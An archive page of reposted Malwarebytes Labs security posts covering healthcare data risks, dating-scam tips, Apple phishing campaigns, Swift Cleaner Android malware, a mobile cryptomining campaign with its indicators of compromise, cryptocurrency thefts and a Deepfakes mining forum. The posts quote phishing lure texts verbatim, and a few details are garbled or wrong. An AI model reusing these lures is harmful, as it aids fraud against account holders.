Browsing articles in "Internet Security"
Feb 15, 2018
John
Comments Off on Physician, protect thyself: healthcare cybersecurity circling the drain

Physician, protect thyself: healthcare cybersecurity circling the drain

No one knows you better than you do. But thanks to technology advances and the continued digitization of healthcare data accumulation and sharing processes, we can also honestly say the same about your healthcare provider.

Indeed, every time we get in touch with a health professional, data is recorded (either on paper or electronically), entered into a computer, and then stored in a massive database for record-keeping, analysis, and retrieval.

This digital warehouse of electronic health records (EHR), which contain medical history, diagnoses, and medications (including billing data, insurance, and other personally identifiable information), is what cybercriminals are after. For healthcare facilities in the business of research, intellectual property is their primary asset at risk. Such a trove in the wrong hands could mean nothing good.

A horripilation of dread

Dismally, where healthcare excels in medical breakthroughs and advances in therapy, it lacks in cybersecurity preparedness and adoption of privacy practices. Studies from independent organizations consistently reveal that the continuous use of legacy systems—those outdated programs and computers running Windows XP—scarce resources allocated for cybersecurity, and an apparent shortage of IT professionals top the list of problems the healthcare industry faces. And this is just the tip of the iceberg.

Technological advancements that make reviewing, sharing, and storing digital information possible present other significant challenges that need addressing. They include:

  • The easy accessibility of patient records
  • The automation of clinical systems (e.g. the ordering of prescription medicine for patients)
  • The introduction of external media or third-party devices to the hospital network
  • The emergence of mobile health apps
  • The increasing adoption of BYOD
  • The overall lack of awareness of risks to patient health data among hospital and clinic staff

Below, we take a look at the cybersecurity risks that each of these challenges present.

Easy accessibility of patient records

Public-facing healthcare facilities like hospitals and clinics have embraced the move from paper records to digital records. In so doing, they gather and store patient data into databases open to anyone with access to them, whether it be a doctor 20 miles from the building or a nurse at the reception desk.

The digitization of patient health records also made the process of sharing information across multiple healthcare facilities easier. Patients, too, are given access to their health records. Because of this, the likelihood of exposure to threats increases.

All that storing, retrieving, and sharing leaves the door open to malicious actors who can just as easily infiltrate the database to steal information and sell it on the black market. How valuable is patient data? Very valuable. Medicare ID numbers belonging to 10 patients, for example, are being sold for 22 Bitcoins, which amounts to more than $200,00 as of this writing. EHRs carries a hefty price tag because this is the kind of data that criminals can use and reuse for decades. And unlike credit card data, medical records cannot be altered or canceled once used in fraud.


Read: Think tank summarizes what happens to healthcare records after breach


Automation of hospital and clinic systems

Removing redundant and tedious tasks from healthcare professionals’ workday is a sound business move. It increases productivity, saves money, and improves the patient experience. However, as much good as automation has brought the industry, the implementation of its systems may have been carried out without cybersecurity or privacy in mind.

Those who quickly went about deploying automation for services like refilling prescriptions or making appointments might have medical devices and web-facing computers in the same network when they should be separate, for example. When medical devices are networked on the Internet and not secured, that leaves the door open for threat actors to exploit.

External media or third-party devices

Although the use of unencrypted external media and portable devices is against HIPPA (Health Insurance Portability and Accountability Act of 1996) standards, staff and third-party contractors continue to introduce such devices to computer systems connected to the hospital network. There have also been instances where patients have brought their medical records in via external media for doctors to review.

Two possible ends could come from this: portable media and devices might get stolen or misplaced, resulting in a security breach, and/0r malware might be introduced to the network. Ideally, both ends should be avoided at all cost.

Mobile health apps

We’re talking about mobile health, or mHealth, apps used by patients and medical professionals alike. These apps collect data from whoever uses them, and if doctors have access to this data, they can readily provide feedback or advise. Unfortunately, there is no such thing as a “one app that rules them all.” There are thousands of them out there in the market, believe it or not. And each one of them needs to be secured, else risk all those data getting leaked.

Bring Your Own Device (BYOD)

In 2012, Aruba Networks published the results of their survey, revealing that 85 percent of healthcare staff and professionals support the use of personal mobile devices, such as smartphones, laptops, and tablets, at work. Some say this trend is a natural fit for the industry as doctors and nurses are frequently on the move.

Being able to access records on the fly and sharing them with colleagues increases collaboration and productivity among healthcare staff. However, mobile devices owned by hospital staff and professionals are liable to theft. If they are not encrypted, it’s easy enough for the thief to retrieve, make use of, or sell the EHR stored in them.

Some hospitals and clinics also allow patients and visitors to connect to the facility’s Internet. This results in both patient and staff member BYOD devices overwhelming the bandwidth. On top of this, no one is really sure if such devices are secure enough, if at all. If a potentially infected device is introduced to the network, malware could take residence in the server or spread to other devices connected to the network.


Read: BYOD, why don’t you?

______________________________________________________________________________________________________________________________________

Lack of cybersecurity awareness

Lastly, healthcare staff is generally unaware of threats to patient data and are poorly prepared to identify attack types. This is probably why they may appear negligent in handling email, mobile devices, and hospital records. As we have already established before, cybersecurity issues are not just something that IT staff should scramble to address. Everyone, including nurses and doctors, has a responsibility to uphold when it comes to protecting patient data and securing hospital resources from external threats.

Sadly, there’s no panacea in sight

Unfortunately, there’s no magic bullet to address the myriad of challenges born from an environment this complex. In fact, addressing problems and risks surrounding something this important shouldn’t be rushed. People’s lives, after all, are at stake here, too. Although an overhaul may be needed to completely turn things around for the healthcare industry, this still takes a considerable amount of time to implement. And even if it has been completed, continuous improvement must naturally follow.

The good news is that healthcare facilities, regardless of size, don’t have to wait for a major revamp to happen before they can address the current dilemmas plaguing their industry. In part 2 of this post, we’ll discuss steps healthcare organizations can take to stay secure—beginning with awareness and education campaigns.

Until then, be well and stay safe!

The post Physician, protect thyself: healthcare cybersecurity circling the drain appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 14, 2018
John
Comments Off on Online security tips for Valentine’s Day: how to beat the cheats

Online security tips for Valentine’s Day: how to beat the cheats

Valentine’s Day is upon us once more, and so are lots of dating-friendly security tips. Read on and secure your profile, alongside (one hopes) the love of your life.

1. Not so hot singles in your area

Many dating apps have geotagging enabled, regardless of whether you created your profile on a website or through the app itself. Some dating sites base the location you initially enter to serve up a list of possible matches within a certain radius, but they don’t display the location info on your profile.

Get familiar with the granular controls on the dating site’s settings and make sure you understand the differences. Many mobile apps aren’t hugely clear about which thing does what, so if in doubt, disable a particular feature until you can be 100 percent sure. As a side note, ensure you don’t have geotagging enabled on any photographs you upload. If in doubt, use a picture from a public location away from your main residence. You can also use online tools to check what EXIF information is stored in images you want to use and remove it if needed.

You’ll find some additional practical advice in terms of real world security on the Selfie Security blog we posted a while back. You should pay particular attention to not including location specific items in your photograph(s), such as bills with your address on them. Of course, if you want to enable geotagging then go ahead—just be mindful of the issues that could arise. The easier you are to find, the easier it is for that one terrible date you had to hang around your home, workplace, or just generally trail around familiar locations and become a major nuisance. We see many cases of stalking due to jilted hangers on from dating apps—don’t fall into this trap.

If stalking does happen to you, go to your local police department and let them know what’s happening. Depending on how much information the other person has, it may already be too late to go on blackout, but you can at least let those in authority know that somebody is pestering you.

2. Money thieves in your area

Scammers setting up fake profiles then asking for money is astonishingly common, and it’s all to easy to be taken to the cleaners as a result. Just like 419 scams, romance fakers often use templates—or just lazily cut and paste Bot spam to reuse for their own purposes—and fans of dating sites should get into the habit of Googling common phrases, just to see if someone else is saying the same thing. If Steven J. Fakename is posting identical romantic overtures on six different sites, you can be sure it’s time to move along.

With regard to common scam angles, watch out for anything related to:

  • Sick relatives
  • Medical emergencies
  • Lost overseas and need a plane ticket
  • Lost passport and need a visa/replacement passport
  • Wallet stolen and no funds available
  • Coming to visit, but there’s a last minute ticket price hike and I need your help

On a related note, don’t ever let strangers send money to your bank account for any reason. They’ll probably get you to forward the cash on to someone else, and at that point, you’ve become a money mule.

That’s a criminal offence, and you really don’t want to be doing any of those.

3. My other profile is also in your area

Be cautious around links sent your way that direct you to another website, and be particularly careful around links to downloadable files. Scammers will often try and remove you from the relative safety of the service you happen to be using, directing you to links and files that the dating site you started with can’t hope to contain. That’s been a staple attack on social media sites for many a year, but it works with dating too.

If someone sends you shortened URLs, you can usually expand them to see where they end up. If you’re still not sure, try googling the link. If still nothing comes up to allow you to make an informed decision, you should just ignore whatever you’ve been sent—it isn’t worth the risk. You’ll probably want to block and report the sender while you’re at it.

4. Personal information in your area

Don’t put your real name, age, or location in your profile, email, or anything else related to the dating site you’re on. Anonymous usernames are fine. You should also use a disposable email address when you sign up to a new dating service—not only will this keep people you’d rather not stay in touch with away from your main mailbox, it’ll also be obvious if a dating site decides to sell your email to spammers. This is a good trick to use outside of online dating, too. Of course, the less personal information you put on a dating profile, the more likely it is that potential suitors may simply move on. As with everything, the decision is yours.

5. Bots in your area

If you have an open private message system, you’ll likely receive many, many messages from people wanting to chat. Some dating websites will also send multiple daily messages to users via email claiming that persons x, y, and z would like to talk to you. They may even ask about cookie dough (and it better be delicious considering the eventual $118.76 monthly fee). Most dating bots will cycle through a canned script of a dozen or so phrases before claiming you need to be “verified” in some way. This will inevitably lead to a request for payment information.

Don’t do it. If in doubt, contact the service you’re using and ask them about it directly. You’ve probably seen examples of this on blogs about Skype spam.

Bots will advertise everything from pornography to mobile games, and spammers commonly use images ripped from the net for their profile avatars. You can try and see if the picture is a stock photo by using the “Search Google for this image” option in your browser, or fire up TinEye to see what’s out there.

Bot accounts probably won’t have a realistic looking bio, or have links to profiles on popular social networks. If it looks cookie-cutter, there’s a good chance it might be. Feel free to see if they pop up across the web anyway and you’ll quickly learn if they’re one of a kind or part of a wave of identikit bots. The bottom line is that nobody is going to start sending you random messages that you’re their hero and can we get married in 10 minutes please, so approach any and all conversations with a healthy dose of skepticism from the outset.

6. Dubious pics in your area

Be wary of people asking for intimate photographs and/or video, as this is a surefire way to find yourself blackmailed into handing over lots of money. If you do pay the blackmailer, there’s no guarantee the images won’t be leaked anyway. There’s also the issue of revenge porn to consider, and the legal issues that will inevitably arise as a result.

Put simply: don’t do it. Again.

Even with these precautions in place, problematic pieces of tech, such as the recent Deepfakes furore ensures that anyone placing even a few dozen images or video online could end up in a (fake) pornographic movie. Given that people tend to place many, many photos of themselves in their best light on dating pages, along with the occasional movie clip, it might be an idea to at least roll back the volume of photos you have of yourself online.

Hopefully, the above will help to keep you out of trouble while swiping left, right, up, and quite possibly down. Here’s to a safe online Valentine’s Day experience for everybody.

The post Online security tips for Valentine’s Day: how to beat the cheats appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 13, 2018
John
Comments Off on Panic attack: Apple scams apply pressure

Panic attack: Apple scams apply pressure

We’ve seen a number of Apple-related phishes in circulation over the last few days. While most of them already lead to deactivated phishing sites, we thought it was worth highlighting some of the tricks being used to bait people into handing over payment details at the moment.

Fake receipt emails

First up, a number of fake “receipt” emails ranging in date from February 2–6. While the content of some of the emails varies slightly, most of them use a subject line similar to the below:

[ New Statement ] Your receipt from Apple [ 02 February 2018 ]

In the cases we’ve seen, the mails claim to be receipts for a payment of $9.99 made out to, er, Mr. Edward Snowden. Apparently, privacy campaigns and 2 terabyte storage plans go together nicely.

fake apple cloud purchase

 

Click to enlarge

The general rule of thumb is to try and be as inconspicuous as possible, so we’re not really sure why the scammers went with one of the most well-known privacy advocates on the planet to fill in the personal information box. Not only that, but they used a randomly-grabbed address from a property website sporting nine bedrooms and four bathrooms.

Maybe the plan is to hit the potential victim with something so utterly ludicrous, that they’ve already clicked the link before they’ve had time to think about it. For a lot of people, simply seeing a “Thanks for the order of this thing that costs you money” would be enough to have panic set in.

The good news for potential clickers is, the site the scammers are trying to bounce through is already wise to the scam and has effectively killed the one-way street to the phish page.

That link is down

Click to enlarge

The phish link itself is also offline, so we can’t show you what may lay in wait. But we can confirm people won’t be losing money to this one anytime soon.

Someone else logged in

Elsewhere, we have a “Reminder” notification that someone else is logging in on your Apple account with an iPod in Monaco.

ipod login

Click to Enlarge

The email reads as follows:

[Reminder] [Notification Update] Statement new log-in your Apple account with other device

Fοuг уοuг ѕаfеtу, уοuг Αррlе ID hаѕ Ьееn lοсκеd Ьесаuѕе wе fοund ѕοmе ѕuѕрісіοuѕ асtіνіtу οn уοuг ассοunt. Ѕοmеοnе ассеѕѕіng уοuг ассοunt аnd mаκе ѕοmе сhаngе οn уοuг ассοunt іnfοгmаtіοn. This the details :
Country : Monaco
IP Address :
Date and Time : 13:09, 06 Feb 2018
OS : iPod
Browser : Safari

If you did not make these action or you believe an unauthorized person has accessed your account, you should login to your account as soon as possible to verify your information.

Apart from the lazy typos (“Four your safety”) and awful sentence structure, they also make use of some Cyrillic characters in a likely attempt to bypass Beyesian filtering. While the destination site was offline again, it’s worth noting that all of the examples tried to send potential victims to HTTPs websites, instead of the plain old HTTP landing page. All phishers now want to look as “secure” as they possibly can—anything to help pull the wool over your eyes.

Always worth repeating: Just because a website is HTTPs, does not mean it is a legitimate website. Phish pages can lurk anywhere, no matter what security the page you’re on happens to be touting.

Apple care scare

There’s also some dubious texts going around claiming to be from Apple Care:

final notification

It reads as follows:

Final Notification

Your Apple ID is due to expire today. Prevent this by confirming your Apple ID at

appleid-revise(dot)com

Apple Inc

As you can see, there’s a big push to apply pressure to potential victims, and everything falls somewhere between the two extremes of “Payment made, quick do something!” and “So, your account is going to be terminated.” While we’re happy to say this is another one that came to our attention already DOA, even as texts were going out, the sad truth is that for every site taken down there are many more happily accepting credit card details and personal information.

Fake app purchases

We’ve also seen some fake app purchases, and this one rather spookily has an order number attached that was actually of some relevance to the recipient.

Be aware of Apple Phishing email! (See pic) I checked my payment source, & called Apple. They DO NOT have a link in the receipt emails. The order ID was a valid one from a purchase 2 months ago. (Not this purchase) #TeamEmmmmsie #TUGfam #MGC #AppleSupport pic.twitter.com/SZYY2YxS0q

— Rick92647 [TeEm] [TugFam] [MGC] (@Rick92647) February 5, 2018

While one hopes this is just some horrible coincidence, it could just as easily have prompted the above individual to start visiting rogue links—and that’s all it really takes. Just one fragment of information from an otherwise garbled email missive could be enough to cost someone a small fortune—or even worse, a very large one.

If you’re worried about the pushy tone of a supposed Apple missive, contact them directly to check its validity, and wander over to their help page for more information on securing your Apple account. These are some of the most common scams around, and for as long as Apple IDs are tied to valuable purchases and personal information, criminals will continue target these accounts.

The post Panic attack: Apple scams apply pressure appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 13, 2018
John
Comments Off on Kotlin-based malicious apps penetrate Google market

Kotlin-based malicious apps penetrate Google market

An open-source programming language, Kotlin is a fully-supported official programming language for Android. Google boasts that Kotlin contains safety features in order to make apps “healthy by default.” Many apps are already built with Kotlin, from the hottest startups to Fortune 500 companies. (Twitter, Uber, Pinterest)

Concise while being expressive, Kotlin reduces the amount of boilerplate code needed to create an app—which makes it much safer. However, as revealed by Trend Micro researchers, the first samples of Android malware created using Kotlin were found on Google Play. Introducing: Swift Cleaner, a utility tool built with Kotlin that claims to clean and optimize Android devices.

This malicious app is capable of remote command execution, can steal personal information, carry out click fraud, and sign users up to premium SMS subscription services without their permission. So much for safe.

Analyze this

Subsequently, after launching Swift Cleaner, the first thing the malware does is call PspManager.initSDK, check the phone number, and send an SMS message to the particular number that is given by the C&C server. The app initiates this to check for a SIM card presence and if mobile carrier services are available.

Upon server interaction, the malicious part of the app launches URL forwarding and click fraud activities. Click fraud is an illegal practice that occurs when individuals click on a website’s advertisements (either banner ads or paid text links) to increase the payable number of clicks to the advertiser. In our case, the app clicks on a URL, which leads you to a survey. At the end of the survey, you are given an opportunity to get some free services if you click on the claim link. By clicking the button, you will then be redirected to another possibly malicious website.

Meanwhile, Swift Cleaner collects personal information from the infected mobile device, such as the International Mobile Equipment Identity (IMEI), International Mobile Subscriber Identity (IMSI), and information about the SIM card. The stolen information is then encrypted and sent to the remote Command and Control (C&C) server.

There are services that run in the background in order to communicate with a C&C server. Swift Cleaner compromises one of these services: the Wireless Application Protocol (WAP). WAP is a technical standard for accessing information over a mobile wireless network.

The app is using WAP in conjunction with JavaScript in order to bolt on CAPTCHA bypass functionality, using mobile data and analyzing the image base64 code. CAPTCHA images are parsed and cracked, and the image data will later be uploaded to the C&C server. This data is needed to train the neural network. Later on, all the image samples will be useful for finding the best match for each character of the new upcoming CAPTCHA.

Premium SMS service

The Swift Cleaner malware also uploads information about the user’s service provider along with login information and similar sensitive data to the C&C server. This can automatically sign users up for a premium SMS service, which will cost money.

Premium rate SMS is a way of mobile billing where user pays for a premium service by either receiving or sending a message. There are two ways this billing service works:

  1. Mobile Originated (MO): where the mobile user pays to send a message (used for once-off services, such as competitions)
  2. Mobile Terminated (MT): where the mobile user pays to receive a message (used for subscription services)

Our example app uses the premium SMS MO service, and redirects users to webpages where they can select to send a message.

Neverending story

As of now, Google has removed the fake Swift Cleaner apps carrying this new malware from the Play Store. However, even if Google states that their protection is on a high level, there appears to be no fail-proof way to stop malware from entering the Play store. By using a quality mobile anti-malware scanner as second layer of protection, you can stay safe even when Google Play Protect fails. We (as always) recommend Malwarebytes for Android. Stay safe out there!

The post Kotlin-based malicious apps penetrate Google market appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 12, 2018
John
Comments Off on A week in security (February 5 – February 11)

A week in security (February 5 – February 11)

Last week on Malwarebytes Labs, we featured a new Flash Player zero-day that has been found in recent targeted attacks. And we talked about a new trick to cripple browsers that came out of the hat of tech support scammers.

We also covered several methods of stealing cryptocurrencies, including one for the Mac that wasn’t as new as it seemed, one for Android that poses as hack apps, and yet another abusing the fact that Deepfakes content was banned from most major networks. We even threw in an overview of several major cryptocurrency related thefts.

For Safer Internet Day 2018, we provided you with some fast and free tools to make your Internet experience safer and more private using ad blockers and anti-trackers.

Other news

  • Security researcher Scott Helme reported that thousands of US and UK government sites were running a compromised BrowserAloud plugin, making visitors mine for the Monero cryptocurrency. (Source: Sky News)
  • Lenovo warned customers about two critical Broadcom (Wifi) vulnerabilities that impact 25 models of its popular ThinkPad brand. (Source: ThreatPost)
  • Research shows that LiteCoin will be the next dominating cryptocurrency on the Dark Web, and not Monero as expected. (Source: Recorded Future)
  • A free decryption tool was released for Cryakl ransomware by Belgian Federal Police together with Kaspersky Lab. (Source: Bleeping Computer)
  • The Russian Research Institute of Experimental Physics was found to be using their nuclear supercomputer for cryptomining. (Source: Naked Security)
  • Researchers have identified a new strain of point-of-sale (PoS) malware that impersonates a LogMeIn service pack to steal credit card data via a DNS server. (Source: Tripwire)
  • The US Justice Department announced charges on Wednesday against three dozen individuals thought to be key members of ‘Infraud,” a long-running cybercrime forum that federal prosecutors say cost consumers more than half a billion dollars. (Source: Krebs on Security)
  • Working with Fujitsu, Microsoft is further embracing biometric technology with the implementation of a palm-vein authentication system that will be supported by Windows 10 Pro. (Source: CBR online)
  • Key iPhone source code gets posted online that could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve. (Source: Motherboard)
  • VMware has advised on how to mitigate the Meltdown and Spectre chip design flaws in several of its products. (Source: The Register)

Stay safe, everyone!

The post A week in security (February 5 – February 11) appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 12, 2018
John
Comments Off on Drive-by cryptomining campaign targets millions of Android users

Drive-by cryptomining campaign targets millions of Android users

Malvertising and online fraud through forced redirects and Trojanized apps—to cite the two most common examples—are increasingly plaguing Android users. In many cases, this is made worse by the fact that people often don’t use web filtering or security applications on their mobile devices.

A particular group is seizing this opportunity to deliver one of the most lucrative payloads at the moment: drive-by cryptomining for the Monero (XMR) currency. In a campaign we first observed in late January, but which appears to have started at least around November 2017, millions of mobile users (we believe Android devices are targeted) have been redirected to a specifically designed page performing in-browser cryptomining.

In our previous research on drive-by mining, we defined this technique as automated, without user consent, and mostly silent (apart from the noise coming out of the victim’s computer fan when their CPU is clocked at 100 percent). Here, however, visitors are presented with a CAPTCHA to solve in order to prove that they aren’t bots, but rather real humans.

“Your device is showing suspicious surfing behaviour. Please prove that you are human by solving the captcha.”

Until the code (w3FaSO5R) is entered and you press the Continue button, your phone or tablet will be mining Monero at full speed, maxing out the device’s processor.

Redirection mechanism

The discovery came while we were investigating a separate malware campaign dubbed EITest in late January. We were testing various malvertising chains that often lead to tech support scams with an Internet Explorer or Chrome user-agent on Windows. However, when we switched to an Android, we were redirected via a series of hops to that cryptomining page.

It seems odd that a static code (which is also hardcoded in the page’s source) would efficiently validate traffic between human and bot. Similarly, upon clicking the Continue button, users are redirected to the Google home page, another odd choice for having proved you were not a robot.

While Android users may be redirected from regular browsing, we believe that infected apps containing ad modules are loading similar chains leading to this cryptomining page. This is unfortunately common in the Android ecosystem, especially with so-called “free” apps.

It’s possible that this particular campaign is going after low quality traffic—but not necessarily bots —and rather than serving typical ads that might be wasted, they chose to make a profit using a browser-based Monero miner.

We identified several identical domains all using the same CAPTCHA code, and yet having different Coinhive site keys (see our indicators of compromise for the full details). The first one was registered in late November 2017, and new domains have been created since then, always with the same template.

Domain name, registration date

Traffic stats

We believe there are several more domains than just the few that we caught, but even this small subset is enough to give us an idea of the scope behind this campaign. We shared two of the most active sites with ad fraud researcher Dr. Augustine Fou, who ran some stats via the SimilarWeb web analytics service. This confirmed our suspicions that the majority of traffic came via mobile and spiked in January.

We estimate that the traffic combined from the five domains we identified so far equals to about 800,000 visits per day, with an average time of four minutes spent on the mining page. To find out the number of hashes that would be produced, we could take a conservative hash rate of 10 h/s based on a benchmark of ARM processors.

It is difficult to determine how much Monero currency this operation is currently yielding without knowing how many other domains (and therefore total traffic) are out there. Because of the low hash rate and the limited time spent mining, we estimate this scheme is probably only netting a few thousand dollars each month. However, as cryptocurrencies continue to gain value, this amount could easily be multiplied a few times over.

Conclusion

The threat landscape has changed dramatically over the past few months, with many actors jumping on the cryptocurrency bandwagon. Malware-based miners, as well as their web-based counterparts, are booming and offering online criminals new revenue sources.

Forced cryptomining is now also affecting mobile phones and tablets en masse—not only via Trojanized apps, but also via redirects and pop-unders. While these platforms are less powerful than their Desktop counterparts, there is also a greater number of them out there. Similar to what we see with IoT devices, it’s not always the individual specifications, but rather the power of the collective group altogether that matters.

We strongly advise users to run the same security tools they have on their PC on their mobile devices, because unwanted cryptomining is not only a nuisance but can also cause permanent damage.

Malwarebytes mobile users are protected against this threat.

Indicators of compromise

Domains:

rcyclmnr[].com
rcylpd[.]com
recycloped[.]com
rcyclmnrhgntry[.]com
rcyclmnrepv[.]com

Referring websites (please note that they should not be necessarily considered malicious):

panelsave[.]com
offerreality[.]com
thewise[.]com
go.bestmobiworld[.]com
questionfly[.]com
goldoffer[.]online
exdynsrv[.]com
thewhizmarketing[.]com
laserveradedomaina[.]com
thewhizproducts[.]com
smartoffer[.]site
formulawire[.]com
machieved[.]com
wtm.monitoringservice[.]co
traffic.tc-clicks[.]com
stonecalcom[.]com
nametraff[.]com
becanium[.]com
afflow.18-plus[.]net
serie-vostfr[.]com
pertholin[.]com
yrdrtzmsmt[.]com
yrdrtzmsmt.com
traffic.tc-clicks[.]com

Conhive site keys:

gufKH0i0u47VVmUMCga8oNnjRKi1EbxL
P3IN11cxuF4kf2kviM1a7MntCPu00WTG
zEqkQef50Irljpr1X3BqbHdGjMWnNyCd
rNYyUQUC5iQLdKafFS9Gi2jTVZKX8Vlq

The post Drive-by cryptomining campaign targets millions of Android users appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 9, 2018
John
Comments Off on Bank robbers 2.0: digital thievery and stolen cryptocoins

Bank robbers 2.0: digital thievery and stolen cryptocoins

Imagine running down the street (and away from law enforcement) with 2,000 pounds of gold bars. Or 1,450 pounds in $100 bills. With both of these physical currencies amounting to roughly US$64 million, you’d be making quite a steal…if you could get away with it.

That’s exactly what the next generation of thieves—bank robbers 2.0—did in December 2017, when they stole more than $60 million in Bitcoin* from the mining marketplace NiceHash. It turns out stealing Bitcoin is a lot less taxing on the body.

*Disclaimer: I used the value of Bitcoins as they were at the time of the robbery. Current values are volatile and change from minute to minute.

Crime these days has gotten a technical upgrade. By going digital, crooks are better able to pull off high-stakes sting operations, using the anonymity of the Internet as their weapon of choice. And their target? Cryptocurrency.

Old-school bank robbers

The amount of money stolen from NiceHash is comparable to arguably the biggest physical heist to date, the theft of nearly $70 million from a Brazilian bank in 2005. Noted in the Guinness Book of World Records, the robbers managed to get away with 7,716 pounds of 50 Brazilian real notes. There were 25 people involved—including experts in mathematics, engineering, and excavation—who fronted a landscaping company near the bank, dug a 78-meter (256-foot) tunnel underneath it, and broke through 1 meter (about 3.5 feet) of steel-reinforced concrete to enter the bank vault.

The largest bank robbery in the United States, meanwhile, was at the United California Bank in 1972. The details of this bank robbery were described by its mastermind, Amil Dinsio, in the book Inside the Vault. A gang of seven, including an alarm expert, explosives expert, and burglary tool designer, broke into the bank’s safe deposit vault and made off with cash and valuables with an estimated value of $30 million US dollars.

What these robberies have in common is that, in order to pull them off, there were large groups of criminals involved with various special skills. Most of the criminals of these robberies were either caught or betrayed—physical theft leaves physical traces behind. Today’s physical robbers run the risk of getting hurt or hurting others, or leaving behind prints or DNA. And they are often tasked with moving large amounts of money or merchandise without being seen.

heavy loot

Bank robbers 2.0

So here comes the bank robbers 2.0. They don’t have to worry about transporting stolen goods, fleeing the crime scene, digging or blowing things up. They are in no—immediate—physical danger. And if they’re smart enough, they work alone or remain anonymous, even to their accessories. Their digital thievery has been proven successful through several methods used to obfuscate their identity, location, and criminal master plan.

Social engineering

One of the most spectacular digital crimes targeted 100 banks and financial institutions in 30 nations with a months-long prolonged attack in 2013, reportedly netting the criminals involved over $300 million. The group responsible for this used social engineering to install malicious programs on bank employees’ systems.

The robbers were looking for employees responsible for bank transfers or ATM remote control. By doing so, they were able to mimic the actions required to transfer money to accounts they controlled without alerting the bank that anything unusual was going on. For example, they were able to show more money on a balance than was actually in the account. An account with $10,000 could be altered to show $100,000 so that hackers could transfer $90,000 to their own accounts without anyone noticing anything.

The alleged group behind this attack, the Carbanak Group, have not yet been apprehended, and variants of their malware are still active in the wild.

Ponzi schemes

Bitcoin Savings & Trust (BST), a large Bitcoin investment firm that was later proved to be a pyramid scheme, offered 7 percent interest per week to investors who parked their Bitcoins there. When the virtual hedge fund shut down in 2012, most of its investors were not refunded. At the time of its closing, BST was sitting on 500,000 BTC, worth an estimated $5.6 million. Its founder, an e-currency banker who went by the pseudonym pirateat40, only paid back a small sum to some beneficiaries before going into default. It was later learned that he misappropriated nearly $150,000 of his clients’ money on “rent, car-related expenses, utilities, retail purchases, casinos, and meals.”

Hacking

Even though details are still unclear, the NiceHash hack was reported as a security breach related to the website of the popular mining marketplace. Roughly 4,732 coins were transferred away from internal NiceHash Bitcoin addresses to a single Bitcoin address controlled by an unknown party. The hackers appear to have entered the NiceHash system using the credentials of one of the company’s engineers. As it stands now, it is unknown how they acquired those, although it’s whispered to be an inside job.

Stolen wallet keys

In September 2011, the MtGox hot wallet private keys were stolen in a case of a simple copied wallet.dat file. This gave the hacker access to not only a sizable number of Bitcoins immediately, but also the ability to redirect the incoming trickle of Bitcoins deposited to any of the addresses contained in the file. This went on for a few years until the theft was discovered in 2014. The damages by then were estimated at $450 million. A suspect was arrested in 2017.

Transaction malleability

When a Bitcoin transaction is made, the account sending the money digitally signs the important information, including the amount of Bitcoin being sent, who it’s coming from, and where it’s going. A transaction ID, a unique name for that transaction, is then generated from that information. But some of the data used to generate the transaction ID comes from the unsigned, insecure part of the transaction.As a result, it’s possible to alter the transaction ID without needing the sender’s permission. This vulnerability in the Bitcoin protocol became known as “transaction malleability.”

Transaction malleability was a hot topic in 2014, as researchers saw how easily criminals could exploit it. For example, a thief could claim that his transactions didn’t show up under the expected ID (because he had edited it), and complain that the transaction had failed. The system would then automatically retry, initiating a second transaction and sending out more Bitcoins.

Silk Road 2.0 blamed this bug for the theft of $2.6 million in Bitcoins in 2014, but it was never proven to be true.

Man-in-the-middle (by design)

In 2018, a Tor proxy was found stealing Bitcoin from both ransomware authors and victims alike. A Tor proxy service is a website that allows users to access .onion domains hosted on the Tor network without having to install the Tor browser. As Tor proxy servers have a man-in-the-middle (MitM) function by design, the thieves were able to replace the Bitcoin address that victims were paying ransom to and insert their own. This left the ransomware authors unpaid, which in turn left the victims without their decryption key.

Cryptojacking

Also known as drive-by mining, cryptojacking is a next-generation, stealthy robbing trick that covers all mining activities completed on third-party systems without the users’ consent. Stealing little amounts from many can amount to large sums. There are so many methods to achieve this that Malwarebytes’ own Jérôme Segura published a whitepaper about it.

Unlike drive-by downloads that push malware, drive-by mining focuses on utilizing the processing power of visitors’ computers to mine cryptocurrency, especially those that were designed to accommodate non-specialized processors. Miners of this kind come to us in advertisements, bundlers, browser extensions, and Trojans. The revenues are hard to guess, but given the number of blocks Malwarebytes records on Coinhive and similar sites daily, criminal profit margins could be potentially record-breaking.

Physical stealing of digital currency

This last one brings us full circle, as someone actually managed to steal Bitcoins the old-fashioned way. In January 2018, three armed men attempted to rob a Bitcoin exchange in Canada, but failed miserably as a hidden employee managed to call the police. However, others have had more success. The Manhattan District attorney is looking for the accomplice of a man that robbed his friend of $1.8 million in Ether at gunpoint. Apparently this “friend” got hold of the physical wallet and forced the victim to surrender the key needed to transfer the cryptocurrency into his own account.

Summary

As we can conclude from the examples above, there are many ways for cybercriminals to get rich quick. With a lot less risk of physical harm and even less hard labor, they can score larger amounts for less risk than the old-fashioned bank robbers. The only pitfall to robbing digital currency is how to turn it into fiat money without raising a lot of suspicion or losing a big chunk to launderers.

While the diminished use of violence is reassuring, it’s still beneficial to think about how we can avoid becoming a victim. Much of it has to do with putting too much trust in the wrong people. We are dealing with a very young industry that doesn’t have a lot of established names. So how can you avoid getting hurt by these modern thieves? Here are a few tips:

  • Don’t put all your eggs in one basket.
  • Use common sense when deciding who to do business with. A little background check into the company and its execs never hurt anyone.
  • Don’t put more money into cryptocurrencies than you can spare.

Additional links

The post Bank robbers 2.0: digital thievery and stolen cryptocoins appeared first on Malwarebytes Labs.

Powered by WPeMatico

Feb 8, 2018
John
Comments Off on New Deepfakes forum goes mining with Coinhive

New Deepfakes forum goes mining with Coinhive

You may or may be familiar with the furore over Deepfakes, a relatively new development in pornography involving a tool called FacesApp, which is capable of producing a real porn clip that replaces the original actors’ heads with those of celebrities—or indeed, anyone at all.

Online fakes have been around since the early 2000s or possibly even earlier; alongside those old photos, fakers would also make the odd terrible porno flick. Those movies would quite literally be a static cut out of a celebrity’s head stuck onto the body. Some 20 years later, the tech has caught up, and the web is suddenly dealing with the fallout.

FacesApp allows people to “train” an AI to create a realistic head so the scene is practically indistinguishable from reality. The AI is trained by feeding it images or footage of people; the more data it has to go off, the more realistic everything is.

